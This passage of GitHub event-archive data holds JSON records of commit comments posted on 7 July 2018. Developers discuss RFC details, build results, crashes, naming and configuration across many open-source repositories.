src=\"https://cs2.livemaster.ru/storage/39/c3/31152e7118c7bde488e7d08dcda9--materialy-dlya-tvorchestva-otdushka-mindal-dlya-myla-svechej-.jpg\" width=\"300\" </div>\r\n  <div>\r\n    <iframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/x1C4_9d32hI\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen></iframe>\r\n  </div>\r\n</body>\r\n</html>\r\n```"}},"created_at":"2018-07-07T07:23:41Z"}
{"id":"7931930280","type":"CommitCommentEvent","actor":{"login":"uhu79"},"repo":{"name":"daviddbeasy/roll20-character-sheets"},"payload":{"comment":{"id":29628828,"position":null,"line":null,"path":null,"commit_id":"941b3c16547f7519d7286c19a55e3edbb4a9946a","created_at":"2018-07-07T07:31:16Z","updated_at":"2018-07-07T07:31:16Z","author_association":"NONE","body":"Hi David, StuartJ (the author of the Stylish-extension for The One Ring) and myself have started the \"Fellowship of the TOR Charsheet\" and are using Trello to create a fancier version of the charsheet with better fonts and nicer graphics. Do you want to join us?"}},"created_at":"2018-07-07T07:31:16Z"}
{"id":"7931932872","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29628831,"position":15,"line":37,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T07:33:32Z","updated_at":"2018-07-07T07:33:32Z","author_association":"NONE","body":"Actually the RFC5569 is the draft proposed by Free.fr the Standard Track RFC that is implemented here is RFC5969.\r\nThe main difference is that 5569 does not admin v4prefixlen != 32 while 5969 defines how to use v4prefixlen"}},"created_at":"2018-07-07T07:33:32Z"}
{"id":"7931937336","type":"CommitCommentEvent","actor":{"login":"wloot"},"repo":{"name":"nobodytouchmyboost/android_device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29628837,"position":null,"line":null,"path":null,"commit_id":"dbe3f32ccd32da6c886848b0cd949f46ecc94b5a","created_at":"2018-07-07T07:37:35Z","updated_at":"2018-07-07T07:37:35Z","author_association":"NONE","body":"Have you encountered log spam: QCOM PowerHAL: Failed to acquire lock."}},"created_at":"2018-07-07T07:37:35Z"}
{"id":"7931937438","type":"CommitCommentEvent","actor":{"login":"RyuunoAelia"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29628838,"position":895,"line":1078,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-07T07:37:41Z","updated_at":"2018-07-07T07:37:41Z","author_association":"NONE","body":"After reading RFC5969 there is no restriction on v4prefixlen, though they remind the full ipv6 of the CE is derived from the ipv4.\r\nThus it could be valid to have  v4prefixlen = 0, while it would make things awkward since each customer would have to obtain a personal ipv6 prefix thus making the ipv6 of the CE static. This side effect could be interesting for customers of Lite DS for example."}},"created_at":"2018-07-07T07:37:41Z"}
{"id":"7931941791","type":"CommitCommentEvent","actor":{"login":"misbach-zuhdi"},"repo":{"name":"bhayangkara0707/palapa-be"},"payload":{"comment":{"id":29628845,"position":null,"line":null,"path":null,"commit_id":"4c1a2ef11320b2560b9bf796177f6d2f927da00b","created_at":"2018-07-07T07:41:50Z","updated_at":"2018-07-07T07:41:50Z","author_association":"CONTRIBUTOR","body":"hi @stevanusandrianta please review the code and how we should use the `getListOfImageIdByText` function?"}},"created_at":"2018-07-07T07:41:50Z"}
{"id":"7931943394","type":"CommitCommentEvent","actor":{"login":"jgirardet"},"repo":{"name":"SublimeText/UnitTesting"},"payload":{"comment":{"id":29628848,"position":null,"line":null,"path":null,"commit_id":"1502c03e2a7c2f1c91f529616b07357e3718fd84","created_at":"2018-07-07T07:43:22Z","updated_at":"2018-07-07T07:43:22Z","author_association":"NONE","body":"yes it is, thanks"}},"created_at":"2018-07-07T07:43:22Z"}
{"id":"7931944912","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628849,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-07T07:44:51Z","updated_at":"2018-07-07T07:44:51Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T07:44:51Z"}
{"id":"7931947631","type":"CommitCommentEvent","actor":{"login":"alekpikl"},"repo":{"name":"alekpikl/hyperledger-fabric"},"payload":{"comment":{"id":29628855,"position":null,"line":null,"path":null,"commit_id":"4fda1fb8f929981e177e6697e18843be49c84db1","created_at":"2018-07-07T07:47:29Z","updated_at":"2018-07-07T07:47:29Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-07T07:47:29Z"}
{"id":"7931950326","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628860,"position":null,"line":null,"path":null,"commit_id":"99f7582398748db7570e5e995137b8103b9d7ebd","created_at":"2018-07-07T07:50:04Z","updated_at":"2018-07-07T07:50:04Z","author_association":"NONE","body":"158868652_Issue#5821 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-99f7582398748db7570e5e995137b8103b9d7ebd-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T07:50:04Z"}
{"id":"7931950548","type":"CommitCommentEvent","actor":{"login":"felixrieseberg"},"repo":{"name":"electron/fiddle"},"payload":{"comment":{"id":29628861,"position":null,"line":null,"path":null,"commit_id":"b328798c931ed1f2c390a66c72739f202e3c25b6","created_at":"2018-07-07T07:50:14Z","updated_at":"2018-07-07T07:50:14Z","author_association":"MEMBER","body":"<img width=\"1312\" alt=\"screen shot 2018-07-07 at 8 49 42 am\" src=\"https://user-images.githubusercontent.com/1426799/42408314-b8bd05ec-81c2-11e8-9910-54ef66c1233a.png\">\r\n"}},"created_at":"2018-07-07T07:50:14Z"}
{"id":"7931951173","type":"CommitCommentEvent","actor":{"login":"Martii"},"repo":{"name":"joeytwiddle/code"},"payload":{"comment":{"id":29628862,"position":null,"line":null,"path":null,"commit_id":"cc9be14ffee74f34837867f3b24d007186612639","created_at":"2018-07-07T07:50:47Z","updated_at":"2018-07-07T07:50:47Z","author_association":"NONE","body":"@joeytwiddle \r\nPlease remember that GH has a cache timeout for rapid fire commits and the raw url... so OUJS may reject the old copy that GH serves.... wait at least a few minutes *(I'd give it 5 minutes just to be sure)* then you can sync/import successfully to OUJS.\r\n\r\nOUJS Admin"}},"created_at":"2018-07-07T07:50:47Z"}
{"id":"7931955570","type":"CommitCommentEvent","actor":{"login":"cssmagic"},"repo":{"name":"Andoromeda-Foundation/cryptohero-frontend-nas"},"payload":{"comment":{"id":29628867,"position":8,"line":5,"path":"src/contract/contract.js","commit_id":"ce9f082e6aa9aedf7d74e56acc90c0cd4c42b104","created_at":"2018-07-07T07:54:46Z","updated_at":"2018-07-07T07:54:46Z","author_association":"NONE","body":"对，这就是我担心的地方。nebPay 0.2.0 默认会展示二维码，而 Nasa.js 内置的 nebPay 0.1.x 则默认不会（Nasa.js 暂时也没有修改 nebPay 配置的途径）。\r\n\r\nNasa.js 会整体设计一下交易流程，但目前还没有完成。抱歉，添麻烦了。"}},"created_at":"2018-07-07T07:54:46Z"}
{"id":"7931955723","type":"CommitCommentEvent","actor":{"login":"LukeUsher"},"repo":{"name":"LukeUsher/Cxbx-Reloaded"},"payload":{"comment":{"id":29628868,"position":451,"line":387,"path":"src/devices/I8259.cpp","commit_id":"183327fd345716f4778c0713396339d7394b2c67","created_at":"2018-07-07T07:54:56Z","updated_at":"2018-07-07T07:54:56Z","author_association":"OWNER","body":"Good spot, one of th see should be irr."}},"created_at":"2018-07-07T07:54:56Z"}
{"id":"7931958805","type":"CommitCommentEvent","actor":{"login":"nrontsis"},"repo":{"name":"nrontsis/PILCO"},"payload":{"comment":{"id":29628878,"position":6,"line":15,"path":"pilco/models/pilco.py","commit_id":"fae0ea5453de548d48307bbcc9a39b439a174ce6","created_at":"2018-07-07T07:57:22Z","updated_at":"2018-07-07T07:57:22Z","author_association":"OWNER","body":"I think this might better be avoided, as we might have rewards that have more than two parameters, in which case t and W would not make sense. Instead, if the user wants to pass custom rewards he can do so by passing a manually created reward object."}},"created_at":"2018-07-07T07:57:22Z"}
{"id":"7931964273","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29628895,"position":null,"line":null,"path":null,"commit_id":"00f9b21cb78d9f76a8f94e8e62cbcefad65b7d99","created_at":"2018-07-07T08:01:35Z","updated_at":"2018-07-07T08:01:35Z","author_association":"MEMBER","body":"does not need to be echo - print does as well. printf does parse the first string as a format string and creates a new one to print from the template with the params. echo and print don't have this overhead."}},"created_at":"2018-07-07T08:01:35Z"}
{"id":"7931968239","type":"CommitCommentEvent","actor":{"login":"Dream-Master"},"repo":{"name":"GTNewHorizons/StandardQuestingPack"},"payload":{"comment":{"id":29628902,"position":null,"line":null,"path":null,"commit_id":"95c435e9b7415ea4be4eea74e9ccc4ef9b940161","created_at":"2018-07-07T08:05:06Z","updated_at":"2018-07-07T08:05:06Z","author_association":"MEMBER","body":"@richardhendricks did we have the permission from Funway Guy to modifying Standart Expansion ?"}},"created_at":"2018-07-07T08:05:06Z"}
{"id":"7931972151","type":"CommitCommentEvent","actor":{"login":"vyshka"},"repo":{"name":"Jagailo/TestingSystem"},"payload":{"comment":{"id":29628907,"position":null,"line":null,"path":null,"commit_id":"e494f264af8bc596adb92a03da08abf477fb58e7","created_at":"2018-07-07T08:08:36Z","updated_at":"2018-07-07T08:08:36Z","author_association":"NONE","body":"Rename it from Realise to Release"}},"created_at":"2018-07-07T08:08:36Z"}
{"id":"7931974070","type":"CommitCommentEvent","actor":{"login":"rahulnjs"},"repo":{"name":"rahulnjs/raffus"},"payload":{"comment":{"id":29628911,"position":null,"line":null,"path":null,"commit_id":"149ca806ac45f7ee07d25906ead4f3265e0752e3","created_at":"2018-07-07T08:10:14Z","updated_at":"2018-07-07T08:10:14Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-07T08:10:14Z"}
{"id":"7931974219","type":"CommitCommentEvent","actor":{"login":"ShaiberAlon"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29628913,"position":null,"line":null,"path":null,"commit_id":"3ce436d7e85b82b89d62d815f683f1561f2bffbf","created_at":"2018-07-07T08:10:21Z","updated_at":"2018-07-07T08:10:21Z","author_association":"MEMBER","body":"Hi Meren, did you mean to push this to the workflow post branch, or did you mean to do this in master?"}},"created_at":"2018-07-07T08:10:21Z"}
{"id":"7931974852","type":"CommitCommentEvent","actor":{"login":"nrontsis"},"repo":{"name":"nrontsis/PILCO"},"payload":{"comment":{"id":29628918,"position":5,"line":19,"path":"pilco/rewards.py","commit_id":"fae0ea5453de548d48307bbcc9a39b439a174ce6","created_at":"2018-07-07T08:10:52Z","updated_at":"2018-07-07T08:10:52Z","author_association":"OWNER","body":"If we choose to do that, then it would be good it everywhere, i.e. allow passing parameters in the constructor of, e.g. RBFcontroller as well."}},"created_at":"2018-07-07T08:10:52Z"}
{"id":"7931974929","type":"CommitCommentEvent","actor":{"login":"wvdvegt"},"repo":{"name":"peterhaneve/evemon"},"payload":{"comment":{"id":29628919,"position":null,"line":null,"path":null,"commit_id":"4a012e3d960fcc679b388fafc9d238c0ba86e4a3","created_at":"2018-07-07T08:10:56Z","updated_at":"2018-07-07T08:10:56Z","author_association":"NONE","body":"This patch unfortunately fails almost completely.\r\n\r\nOnly Asset SafetyWraps show up but with a blank location (but all thrown together onto a big pile). \r\n![capture2](https://user-images.githubusercontent.com/1768983/42408467-5b10d12a-81cd-11e8-9bf3-7373a79610da.JPG)\r\n\r\nAll other stuff does not show up at all (in all groupings i tried), presumably because of the lack of a SolarSystemID. I lack again 1.5k of assets items. \r\n\r\nYou clearly seem to lack inaccessible items to test with (which makes testing extremely hard)."}},"created_at":"2018-07-07T08:10:56Z"}
{"id":"7931976326","type":"CommitCommentEvent","actor":{"login":"RamonYeung"},"repo":{"name":"tkipf/pygcn"},"payload":{"comment":{"id":29628920,"position":null,"line":null,"path":null,"commit_id":"88c6676b2ab98b04bf3bef96b46ea037ebb07b12","created_at":"2018-07-07T08:12:11Z","updated_at":"2018-07-07T08:12:11Z","author_association":"NONE","body":"In Python 3.6+ for line #95@pygcn/train.py, you can use the new `fstring`  feature.\r\n```python\r\nf\"accuracy={acc_test.item():.4f}\"\r\n```"}},"created_at":"2018-07-07T08:12:11Z"}
{"id":"7931977351","type":"CommitCommentEvent","actor":{"login":"meren"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29628923,"position":null,"line":null,"path":null,"commit_id":"3ce436d7e85b82b89d62d815f683f1561f2bffbf","created_at":"2018-07-07T08:13:01Z","updated_at":"2018-07-07T08:13:01Z","author_association":"MEMBER","body":"Of course :( I meant to push it to `master`, but I forgot to change the branch as always.....\r\n\r\nI will take care of it now. Thank you!"}},"created_at":"2018-07-07T08:13:01Z"}
{"id":"7931978318","type":"CommitCommentEvent","actor":{"login":"wvdvegt"},"repo":{"name":"peterhaneve/evemon"},"payload":{"comment":{"id":29628926,"position":null,"line":null,"path":null,"commit_id":"4a012e3d960fcc679b388fafc9d238c0ba86e4a3","created_at":"2018-07-07T08:13:50Z","updated_at":"2018-07-07T08:13:50Z","author_association":"NONE","body":"Btw BPC pricing seems fine now (I'm suddenly not as wealthy anymore ;-)"}},"created_at":"2018-07-07T08:13:50Z"}
{"id":"7931978728","type":"CommitCommentEvent","actor":{"login":"meren"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29628927,"position":null,"line":null,"path":null,"commit_id":"3ce436d7e85b82b89d62d815f683f1561f2bffbf","created_at":"2018-07-07T08:14:13Z","updated_at":"2018-07-07T08:14:13Z","author_association":"MEMBER","body":"Now it should be OK."}},"created_at":"2018-07-07T08:14:13Z"}
{"id":"7931980258","type":"CommitCommentEvent","actor":{"login":"Neim-z-young"},"repo":{"name":"Clarary/maze"},"payload":{"comment":{"id":29628931,"position":null,"line":null,"path":null,"commit_id":"27db8d6b7177598f029a2ee0516aadf7558fca0c","created_at":"2018-07-07T08:15:33Z","updated_at":"2018-07-07T08:15:33Z","author_association":"NONE","body":"实现贪婪，深度优先，宽度优先；以及修改一个bug"}},"created_at":"2018-07-07T08:15:33Z"}
{"id":"7931985626","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29628939,"position":null,"line":null,"path":null,"commit_id":"fde23a92a7e27d4f633da758c4c2d1ddbed709bf","created_at":"2018-07-07T08:20:36Z","updated_at":"2018-07-07T08:20:36Z","author_association":"OWNER","body":"This is only a very minor change, but only z28pro 2/16 is supported here and z28pro 1/8 and 2/8 are very different boards."}},"created_at":"2018-07-07T08:20:36Z"}
{"id":"7931994820","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29628948,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-07T08:28:33Z","updated_at":"2018-07-07T08:28:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-07T08:28:33Z"}
{"id":"7931997207","type":"CommitCommentEvent","actor":{"login":"0601-8251-1202"},"repo":{"name":"TakayoshiKochi/deprecate-style-in-html-imports"},"payload":{"comment":{"id":29628956,"position":5,"line":4,"path":"examples/ex1/master-fixed.html","commit_id":"a1fa10f112bf78dc031283b5cb44a19666368a63","created_at":"2018-07-07T08:30:32Z","updated_at":"2018-07-07T08:30:32Z","author_association":"NONE","body":"Data Scientists Analysts 44081 (SV1) - BHJOB13738_44081 GD"}},"created_at":"2018-07-07T08:30:32Z"}
{"id":"7931997608","type":"CommitCommentEvent","actor":{"login":"0601-8251-1202"},"repo":{"name":"TakayoshiKochi/deprecate-style-in-html-imports"},"payload":{"comment":{"id":29628957,"position":7,"line":6,"path":"examples/ex1/master-fixed.html","commit_id":"a1fa10f112bf78dc031283b5cb44a19666368a63","created_at":"2018-07-07T08:30:50Z","updated_at":"2018-07-07T08:30:50Z","author_association":"NONE","body":"</div>"}},"created_at":"2018-07-07T08:30:50Z"}
{"id":"7931998191","type":"CommitCommentEvent","actor":{"login":"me-no-dev"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29628960,"position":62,"line":92,"path":"libraries/WiFi/src/WiFiClient.cpp","commit_id":"9efecc1be03a7f319df1d86b58f56ae73a6ae510","created_at":"2018-07-07T08:31:20Z","updated_at":"2018-07-07T08:31:20Z","author_association":"MEMBER","body":"free does not complain if pointer is NULL ;)"}},"created_at":"2018-07-07T08:31:20Z"}
{"id":"7931998252","type":"CommitCommentEvent","actor":{"login":"0601-8251-1202"},"repo":{"name":"TakayoshiKochi/deprecate-style-in-html-imports"},"payload":{"comment":{"id":29628961,"position":8,"line":7,"path":"examples/ex1/master.html","commit_id":"a1fa10f112bf78dc031283b5cb44a19666368a63","created_at":"2018-07-07T08:31:23Z","updated_at":"2018-07-07T08:31:23Z","author_association":"NONE","body":"</div>"}},"created_at":"2018-07-07T08:31:23Z"}
{"id":"7931998782","type":"CommitCommentEvent","actor":{"login":"0601-8251-1202"},"repo":{"name":"TakayoshiKochi/deprecate-style-in-html-imports"},"payload":{"comment":{"id":29628965,"position":null,"line":null,"path":null,"commit_id":"a1fa10f112bf78dc031283b5cb44a19666368a63","created_at":"2018-07-07T08:31:52Z","updated_at":"2018-07-07T08:31:52Z","author_association":"NONE","body":"a1fa10f"}},"created_at":"2018-07-07T08:31:52Z"}
{"id":"7931998939","type":"CommitCommentEvent","actor":{"login":"RoelAdriaans"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29628966,"position":58,"line":545,"path":"doc/setup/deploy.rst","commit_id":"896e3f4c1eace0c1ad3e3b472fa373e62d7cddb5","created_at":"2018-07-07T08:32:01Z","updated_at":"2018-07-07T08:32:01Z","author_association":"NONE","body":"Why /var/log/odoo.log when this is discouraged when using multiple workers?"}},"created_at":"2018-07-07T08:32:01Z"}
{"id":"7931999835","type":"CommitCommentEvent","actor":{"login":"0601-8251-1202"},"repo":{"name":"TakayoshiKochi/deprecate-style-in-html-imports"},"payload":{"comment":{"id":29628975,"position":5,"line":4,"path":"examples/ex1/master-fixed.html","commit_id":"a1fa10f112bf78dc031283b5cb44a19666368a63","created_at":"2018-07-07T08:32:50Z","updated_at":"2018-07-07T08:32:50Z","author_association":"NONE","body":" 44081 (SV1"}},"created_at":"2018-07-07T08:32:50Z"}
{"id":"7931999991","type":"CommitCommentEvent","actor":{"login":"ascherer"},"repo":{"name":"ascherer/cwebtest"},"payload":{"comment":{"id":29628976,"position":null,"line":null,"path":null,"commit_id":"593ae366fd85afa2cee7dbe927d18ee5d925f5e9","created_at":"2018-07-07T08:32:58Z","updated_at":"2018-07-07T08:32:58Z","author_association":"OWNER","body":"This rewording effort follows the conventions of `fasc5c.ps` (“Dancing Links”) and should be followed by a similar change in `dlx2-kludge.ch`."}},"created_at":"2018-07-07T08:32:58Z"}
{"id":"7932000134","type":"CommitCommentEvent","actor":{"login":"0601-8251-1202"},"repo":{"name":"TakayoshiKochi/deprecate-style-in-html-imports"},"payload":{"comment":{"id":29628979,"position":6,"line":5,"path":"examples/ex1/master-fixed.html","commit_id":"a1fa10f112bf78dc031283b5cb44a19666368a63","created_at":"2018-07-07T08:33:05Z","updated_at":"2018-07-07T08:33:05Z","author_association":"NONE","body":"</head>"}},"created_at":"2018-07-07T08:33:05Z"}
{"id":"7932000925","type":"CommitCommentEvent","actor":{"login":"Glinkis"},"repo":{"name":"HugoMackpaye/psd.js"},"payload":{"comment":{"id":29628984,"position":null,"line":null,"path":null,"commit_id":"159b9a6b87e61a0a5462da9cdf8b98c643877827","created_at":"2018-07-07T08:33:45Z","updated_at":"2018-07-07T08:33:45Z","author_association":"NONE","body":"Shouldn't the version be `3.3.1`?"}},"created_at":"2018-07-07T08:33:45Z"}
{"id":"7932001991","type":"CommitCommentEvent","actor":{"login":"ZhilkinSerg"},"repo":{"name":"CleverRaven/Cataclysm-DDA"},"payload":{"comment":{"id":29628987,"position":107,"line":880,"path":"src/catalua.cpp","commit_id":"e4df08524b4a0f38e996d88ba7c4b9b268e13851","created_at":"2018-07-07T08:34:37Z","updated_at":"2018-07-07T08:34:37Z","author_association":"CONTRIBUTOR","body":"Crashes on or after `lua_call` with following error in MSYS2:\r\n\r\n![image](https://user-images.githubusercontent.com/16213433/42408750-68479e62-81d9-11e8-88bc-3efa1b2aae7d.png)\r\nError when debugging in Visual Studio:\r\n\r\n```\r\nException thrown at 0x00007FFE510E3C58 in Cataclysm.exe: Microsoft C++ exception: std::out_of_range at memory location 0x0000008AAF5F9F80.\r\nException thrown at 0x00007FFE510E3C58 in Cataclysm.exe: Microsoft C++ exception: [rethrow] at memory location 0x0000000000000000.\r\nUnhandled exception at 0x00007FFE51A1EA1E (ucrtbase.dll) in Cataclysm.exe: Fatal program exit requested.\r\n```\r\n"}},"created_at":"2018-07-07T08:34:37Z"}
{"id":"7932004676","type":"CommitCommentEvent","actor":{"login":"haakonnessjoen"},"repo":{"name":"bitfocus/companion-module-livecore"},"payload":{"comment":{"id":29628989,"position":5,"line":189,"path":"analogway_livecore.js","commit_id":"2e69f43ce2ba5021de9021c62f870bdb82f03aef","created_at":"2018-07-07T08:36:57Z","updated_at":"2018-07-07T08:36:57Z","author_association":"MEMBER","body":"Aha, didn't see the default! My bad. :) I am still sure that the screen selection didn't work from before though :)"}},"created_at":"2018-07-07T08:36:57Z"}
{"id":"7932006018","type":"CommitCommentEvent","actor":{"login":"nrontsis"},"repo":{"name":"nrontsis/PILCO"},"payload":{"comment":{"id":29628990,"position":null,"line":null,"path":null,"commit_id":"fae0ea5453de548d48307bbcc9a39b439a174ce6","created_at":"2018-07-07T08:38:15Z","updated_at":"2018-07-07T08:38:15Z","author_association":"OWNER","body":"It would be nice to avoid pushing changes to the interface directly into the master."}},"created_at":"2018-07-07T08:38:15Z"}
{"id":"7932007080","type":"CommitCommentEvent","actor":{"login":"Nicogene"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29628992,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-07T08:39:15Z","updated_at":"2018-07-07T08:39:15Z","author_association":"CONTRIBUTOR","body":"I proposed to move to bool return value after checking that there is not a return value except 0 and 1, but as @drdanz said it is a very very low priority task and I don't know if we will have time to change it 😅 \r\nAlso because the only benefits are a clearer API and saving 31 bits for the return value 😬 "}},"created_at":"2018-07-07T08:39:15Z"}
{"id":"7932013695","type":"CommitCommentEvent","actor":{"login":"TetsuFe"},"repo":{"name":"TetsuFe/hokudai_furima"},"payload":{"comment":{"id":29628997,"position":null,"line":null,"path":null,"commit_id":"674810b9444af7af18f19e689ccaba8d99f74b51","created_at":"2018-07-07T08:44:51Z","updated_at":"2018-07-07T08:44:51Z","author_association":"OWNER","body":"- get_category.jsで、関数名はgetcategoryじゃなくてgetCategoryの方がいいかも\r\n- _edit_product.htmlにはカテゴリのフォームグループを書かずに、_form_group_select_category.htmlに書いて、{% include form_group_select_category.html %} とした方がいいと思う"}},"created_at":"2018-07-07T08:44:51Z"}
{"id":"7932014197","type":"CommitCommentEvent","actor":{"login":"bonki"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29628999,"position":null,"line":null,"path":null,"commit_id":"42c8212713d5a0b5a60cf5319667c647f7376b8c","created_at":"2018-07-07T08:45:11Z","updated_at":"2018-07-07T08:45:11Z","author_association":"MEMBER","body":"Uh, that's unfortunate. Apparently Apple bumps the reported Apple Clang version when bumping Xcode version. Current stable vanilla Clang is 6, unstable 7. What's odd though is that I tested this with vanilla Clang 4 and 5 as well (without the version check) and both just ignored the option without warning, so it seems Apple Clang does things a little differently. I'll change this and make sure `-Wno-pragma-pack` is actually usable. *Without* disabling this I get hundreds of warnings with recent vanilla Clang on Linux."}},"created_at":"2018-07-07T08:45:11Z"}
{"id":"7932017705","type":"CommitCommentEvent","actor":{"login":"FreHu"},"repo":{"name":"FreHu/abap.tmbundle"},"payload":{"comment":{"id":29629003,"position":null,"line":null,"path":null,"commit_id":"25090f98dde043f60c302ece34bd699a0b73c1df","created_at":"2018-07-07T08:47:36Z","updated_at":"2018-07-07T08:47:36Z","author_association":"OWNER","body":"if testing in vscode, IS is not colored, but is correctly detected. If you want to make sure, use the _inspect tm scopes_ command or set a custom color for the scope in your user settings:\r\n\r\n```json\r\n\"editor.tokenColorCustomizations\": {\r\n        \"textMateRules\": [\r\n            {\r\n                \"scope\": \"keyword.operator.arithmetic\",\r\n                \"settings\": {\r\n                    \"foreground\": \"#b94454\"\r\n                }\r\n            }\r\n        ]\r\n    }\r\n\r\n```"}},"created_at":"2018-07-07T08:47:36Z"}
{"id":"7932018506","type":"CommitCommentEvent","actor":{"login":"EvsenevDev"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29629005,"position":19,"line":19,"path":"SmartReceipts/Services/Auto Backup/Providers/NoOpBackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-07T08:48:15Z","updated_at":"2018-07-07T08:48:15Z","author_association":"OWNER","body":"@wbaumann i didn't know about it. I thought it's means current time. Thanks!"}},"created_at":"2018-07-07T08:48:15Z"}
{"id":"7932018979","type":"CommitCommentEvent","actor":{"login":"EvsenevDev"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29629006,"position":15,"line":15,"path":"SmartReceipts/Services/Auto Backup/Providers/NoOpBackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-07T08:48:37Z","updated_at":"2018-07-07T08:48:37Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-07T08:48:37Z"}
{"id":"7932021333","type":"CommitCommentEvent","actor":{"login":"EvsenevDev"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29629007,"position":24,"line":24,"path":"SmartReceipts/Services/Auto Backup/BackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-07T08:50:35Z","updated_at":"2018-07-07T08:50:35Z","author_association":"OWNER","body":"@wbaumann done :)"}},"created_at":"2018-07-07T08:50:35Z"}
{"id":"7932022671","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29629009,"position":null,"line":null,"path":null,"commit_id":"6035bd164bdcfbcd8b4f49912a39984da1c4559b","created_at":"2018-07-07T08:51:43Z","updated_at":"2018-07-07T08:51:43Z","author_association":"OWNER","body":"For #9 "}},"created_at":"2018-07-07T08:51:43Z"}
{"id":"7932025661","type":"CommitCommentEvent","actor":{"login":"chongiscool"},"repo":{"name":"udacity/reactnd-udacimeals-complete"},"payload":{"comment":{"id":29629012,"position":21,"line":21,"path":"src/components/App.js","commit_id":"e01aeaf5719ab83cb4af8bf6aa944148335122f9","created_at":"2018-07-07T08:54:10Z","updated_at":"2018-07-07T08:54:10Z","author_association":"NONE","body":"@adhik97 Thx, I have figured out."}},"created_at":"2018-07-07T08:54:10Z"}
{"id":"7932034539","type":"CommitCommentEvent","actor":{"login":"You-Ay"},"repo":{"name":"You-Ay/vectors"},"payload":{"comment":{"id":29629028,"position":null,"line":null,"path":null,"commit_id":"618b86a806d844083b648d2eb5abac4945558e84","created_at":"2018-07-07T09:01:18Z","updated_at":"2018-07-07T09:01:18Z","author_association":"OWNER","body":"Great! Much less bloat, more modular."}},"created_at":"2018-07-07T09:01:18Z"}
